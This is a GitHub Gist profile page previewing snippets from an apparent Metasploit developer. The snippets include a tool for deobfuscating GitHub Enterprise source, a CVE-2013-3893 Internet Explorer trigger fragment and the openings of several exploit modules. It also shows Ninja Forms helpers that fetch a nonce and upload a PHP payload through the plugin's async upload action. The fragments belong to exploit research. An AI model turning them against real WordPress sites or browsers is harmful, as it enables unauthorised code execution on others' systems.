Skip to content

Instantly share code, notes, and snippets.


sinn3r wchen-r7

View GitHub Profile
View decrypt_github_enterprise.rb
# This tool is only used to "decrypt" the github enterprise source code.
# Run in the /data directory of the instance.
require "zlib"
require "byebug"
KEY = "This obfuscation is intended to discourage GitHub Enterprise customers "+
View os_js_testcase.html
// Case matters, see lib/msf/core/constants.rb
// All of these should match up with constants in ::Msf::HttpClients
var clients_opera = "Opera";
var clients_ie = "MSIE";
var clients_ff = "Firefox";
var clients_chrome = "Chrome";
var clients_safari = "Safari";
View gist:cbb6b47f096eb4fd4a7c1c53d43d574f
### Keybase proof
I hereby claim:
* I am wchen-r7 on github.
* I am wchenr7 ( on keybase.
* I have a public key whose fingerprint is 4D08 AF54 0F66 C184 3C7D 1942 8048 8089 2F97 A3F7
To claim this, I am signing this object:
View cve_2013_3893_trigger.html
function trigger()
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
View gist:701269eaf9ce2c17ad3888e18ce12248
def fetch_ninja_form_nonce
uri = normalize_uri(target_uri.path, datastore['FORM_PATH'])
res = send_request_cgi(
'method' => 'GET',
'uri' => uri
puts res.body
fail_with Failure::UnexpectedReply, 'Failed to acquire a nonce' unless res && res.code == 200
res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1]
View gist:f1eabf17cb1f9f5a655b879d42c39682
def generate_mime_message(payload_name, nonce)
puts "--- You have nonce: #{nonce.inspect}"
data =
data.add_part('nf_async_upload', nil, nil, 'form-data; name="action"')
data.add_part(nonce, nil, nil, 'form-data; name="security"')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(10)}\"; filename=\"#{payload_name}\"")
View gist:7047590
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
'Name' => "IE test",
View gist:6774619
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
View gist:3d8b95aa9f3e14df8d65
# This module requires Metasploit:
# Current source:
load "./lib/msf/core/exploit/exe.rb"
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote